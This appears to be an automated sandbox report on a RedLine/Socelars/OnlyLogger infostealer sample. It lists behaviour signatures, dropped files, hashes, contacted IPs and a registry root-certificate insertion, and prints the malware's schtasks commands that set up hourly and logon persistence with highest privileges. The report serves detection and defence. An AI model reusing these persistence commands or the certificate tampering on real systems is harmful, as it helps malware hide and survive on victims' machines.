Malware Analysis Report

2025-01-02 06:52

Sample ID 220404-d9qcbsacg4
Target Service.bmpgplkoxjs
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
Tags
evasion spyware stealer trojan onlylogger redline socelars 123 bootkit infostealer loader persistence vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f

Threat Level: Known bad

The file Service.bmpgplkoxjs was found to be: Known bad.

Malicious Activity Summary

evasion spyware stealer trojan onlylogger redline socelars 123 bootkit infostealer loader persistence vmprotect

OnlyLogger

RedLine

RedLine Payload

Modifies Windows Defender Real-time Protection settings

Process spawned unexpected child process

Socelars Payload

Socelars

Identifies VirtualBox via ACPI registry values (likely anti-VM)

OnlyLogger Payload

VMProtect packed file

Executes dropped EXE

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Checks BIOS information in registry

Reads user/profile data of web browsers

Looks up external IP address via web service

Writes to the Master Boot Record (MBR)

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

NSIS installer

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Script User-Agent

Kills process with taskkill

Delays execution with timeout.exe

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-04 03:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-04 03:42

Reported

2022-04-04 06:12

Platform

win7-20220311-en

Max time kernel

4294211s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703091400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000000300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181180b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded309000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118 C:\Users\Admin\AppData\Local\Temp\Service.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A
N/A N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A
N/A N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A
N/A N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1220 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
PID 1220 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
PID 1220 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
PID 1220 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
PID 1220 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1248 wrote to memory of 1548 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
PID 1248 wrote to memory of 1548 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
PID 1248 wrote to memory of 1548 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
PID 1248 wrote to memory of 1548 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
PID 1248 wrote to memory of 700 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Windows\SysWOW64\WerFault.exe
PID 1248 wrote to memory of 700 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Windows\SysWOW64\WerFault.exe
PID 1248 wrote to memory of 700 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Windows\SysWOW64\WerFault.exe
PID 1248 wrote to memory of 700 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Service.exe

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

"C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe

"C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 364

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.65:443 twitter.com tcp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.70:443 yandex.ru tcp
US 8.8.8.8:53 repository.certum.pl udp
NL 104.110.191.14:80 repository.certum.pl tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.21:80 212.193.30.21 tcp

Files

memory/1220-54-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

memory/1248-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

memory/1520-59-0x0000000000000000-mapping.dmp

memory/392-60-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 81180798f4d48d852ec031c3eed10781
SHA1 b66bbc8d7a8e5e0c65b0d9c624f2c13e6bfe8c61
SHA256 f901a508db08da3d9cc47b3eade0ddc2bbb273b92cccecfe26df7a6df9f9e4bc
SHA512 4de8e91721ce37693c410a38ee5fb73ca260b8006904916fbb1892114918b2ced1bfb1d5a4195e666d94ae1fdfbef4932c128b5c2e8e76036869ea11a1a31c58

C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

memory/1248-63-0x0000000003F10000-0x00000000040CF000-memory.dmp

\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe

MD5 3f22bd82ee1b38f439e6354c60126d6d
SHA1 63b57d818f86ea64ebc8566faeb0c977839defde
SHA256 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512 b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f

memory/1548-65-0x0000000000000000-mapping.dmp

C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe

MD5 3f22bd82ee1b38f439e6354c60126d6d
SHA1 63b57d818f86ea64ebc8566faeb0c977839defde
SHA256 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512 b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f

memory/700-67-0x0000000000000000-mapping.dmp

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

Analysis: behavioral2

Detonation Overview

Submitted

2022-04-04 03:42

Reported

2022-04-04 06:15

Platform

win10v2004-20220310-en

Max time kernel

58s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

OnlyLogger

loader onlylogger

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

OnlyLogger Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A
